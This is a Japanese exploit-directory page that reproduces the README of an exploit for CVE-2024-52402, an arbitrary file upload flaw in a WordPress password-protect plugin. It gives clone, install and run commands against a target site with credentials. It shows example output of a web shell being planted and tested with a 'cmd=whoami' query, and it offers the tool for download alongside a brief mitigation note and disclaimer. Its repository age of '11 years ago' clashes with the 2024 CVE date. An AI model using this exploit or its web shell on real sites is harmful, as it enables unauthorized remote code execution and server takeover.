Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-52402 — WordPress Exclusive Content Password Protect プラグイン <= 1.1.0 - CSRFによる任意ファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-52402
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnxploited/cve-2024-52402

CVE-2024-52402

WordPress Exclusive Content Password Protect プラグイン <= 1.1.0 - CSRFによる任意ファイルアップロードの脆弱性

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚀 CVE-2024-52402 のエクスプロイト: WordPress Exclusive Content Password Protect プラグイン <= 1.1.0

🛡️ 概要

このエクスプロイトは、WordPress Exclusive Content Password Protect プラグインのバージョン 1.1.0 以下におけるクロスサイトリクエストフォージェリ (CSRF) 脆弱性を対象としています。この脆弱性により、攻撃者は Web サーバーに Web シェルをアップロードし、潜在的なリモートコード実行を引き起こす可能性があります。

📅 詳細

  • 公開日: 2024-11-19
  • CVE ID: CVE-2024-52402
  • プラグインバージョン: Exclusive Content Password Protect <= 1.1.0
  • 深刻度: CRITICAL (CVSS 9.6)

⚙️ 使用方法

この脆弱性を悪用するには、ターゲットの WordPress サイト URL、有効な WordPress ユーザー名、およびパスワードを指定する必要があります。エクスプロイトスクリプトは WordPress サイトにログインし、Web シェルのアップロードを試みます。

🔧 コマンド

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ オプション

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 例

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 出力例

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 説明

このスクリプトは、Exclusive Content Password Protect プラグインの CSRF 脆弱性を悪用して、WordPress サーバーに Web シェルをアップロードします。ただし、CSRF 攻撃を直接実行するわけではなく、プラグインのファイルアップロード機能を活用してエクスプロイトを達成することに焦点を当てています。

👨‍💻 スクリプトの実行方法

  1. リポジトリのクローン

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. 要件のインストール requests ライブラリがインストールされていることを確認してください:

    root@kitploit:~
    pip install requests
    
  3. スクリプトの実行 以下のコマンドを使用してスクリプトを実行します:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ 緩和策

この脆弱性を緩和するには、Exclusive Content Password Protect プラグインを、この問題が修正された最新バージョンに更新してください。

⚠️ 免責事項

このスクリプトは教育目的のみを対象としています。明示的なテスト許可がないシステムに対してこのスクリプトを不正に使用することは違法かつ非倫理的です。

エクスプロイト作成者: Nxploit , Khaled alenazi.

ツールをダウンロード